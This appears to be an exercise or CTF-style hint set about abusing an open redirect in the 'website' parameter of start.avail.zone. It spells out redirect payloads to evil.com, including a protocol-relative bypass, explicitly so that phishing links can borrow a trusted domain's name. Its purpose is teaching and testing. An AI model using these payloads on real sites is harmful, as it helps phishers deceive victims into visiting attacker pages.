A phishing/spam email promotes a 'free partnership tool' at start.avail.zone. The invite URL passes a domain through a query parameter — what does the server actually do with it? Investigate the request flow and find an abuse path that could turn this 'invite' into something nastier.
Objective: Construct a weaponised invite URL that redirects a victim from the trusted avail.zone domain to an attacker-controlled page.
Context: Legitimate-looking links that start with a known domain (start.avail.zone) are far more convincing in phishing campaigns. If the `website` parameter causes a redirect, an attacker can abuse this from behind the trusted domain name.
Only reveal the ones you need. Claude tracks how many you used to calibrate the feedback.
Think about what a victim sees in their email or chat: they hover over the link and see start.avail.zone — a domain that may appear trustworthy. What happens after they click?
Test whether supplying a full URL (including scheme) in the `website` parameter causes the application to redirect there, e.g. `website=https://evil.com`.
Try the following URL and observe where your browser ends up:
https://start.avail.zone/build-connections?website=https://evil.com
Also test with `//evil.com` (protocol-relative) if the full URL is sanitised.